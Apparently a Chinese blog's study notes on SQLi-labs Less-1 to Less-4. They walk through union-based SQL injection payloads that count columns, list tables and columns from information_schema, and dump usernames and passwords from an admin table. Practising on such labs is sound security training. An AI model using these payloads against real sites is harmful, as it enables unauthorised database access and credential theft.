sqliab刷题笔记-联合注入
2024-10-16 08:55:46
Less-1
- 测试是字符型还是数字型
判断所在字段数
查看显示值
可以看出显示2,3位置。因此我们选择2的位置进行联合注入
查看表名
- 我们要对admin,users等字符敏感
查看admin表中的字段名
显示内容
获得flag:helloword
less-1的代码
Less-2
判断字符型注入还是数字型注入
通过匹配单引号我们可以看出我们所写的单引号并没有被匹配因此我们可以看出这是一个数字注入
判断所在表的字段数
-1+order+by+4
查看显示位置
-1+union+select+1,2,3
查看表名
-1+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
查看admin表名的字段
-1+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
查看内容
-1+union+select+1,(select+concat(username,0x5c,password)+from+admin+limit+0,1),3--+
代码查看
Less-3
查看
-1'
由错误回显可以看出该类型为字符型注入,且需要闭合引号
-1')--+
发现构造成功判断字段数
-1')+order+by+4--+
查看显示位置
-1')+union+select+1,2,3--+
查看表名
-1')+union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
查看字段
-1')+union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
查看内容
代码审计
Less-4
构造
-1'
无反应
-1"
发现我们需要闭合双引号和括号
-1") order by 100--+
发现构造成功
判断该表的字段数
-1")order+by+4--+
判断显示位置
-1")union+select+1,2,3--+
查询表名
-1")union+select+1,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),3--+
查看admin表中的字段名
-1")union+select+1,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='admin'),3--+
获取admin表中内容
-1")union+select+1,(select+concat(username,0x5c,password)+from+admin),3--+
代码审计
最新文章
- 威纶触摸屏和三菱PLC3S之间的通信设置
- phpcms模板标签整理
- commonlisp教程以及学习笔记-01
- Mybatis Generator insert useGeneratedKeys keyProperty
- 透彻分析反射的基础_Class类
- MySQL主备停机步骤与注意事项
- $(function(){})和$(document).ready(function(){}) 的用法
- 暑假集训(4)第一弹 -----递推(Hdu2039)
- uxpin books
- 【Python】不定期更新学习小问题整理
- android 业务需求: 先干掉自己, 在重启自己
- 谷歌插件postman如果不能用,就用git命令发送post请求
- VBS 操作注册表 十六进制
- 苹果手机上点击WEUI日期控件不容易点中
- 第三次Sprint-最后冲刺
- gdb调试1--包括反汇编及文件编码设置
- openresty的安装和使用
- 前端 HTML body标签相关内容 常用标签 表单标签 form 表单控件分类
- python3:logging模块 输出日志到文件
- 【转】PowerDesigner code、name显示设置 及 同时显示办法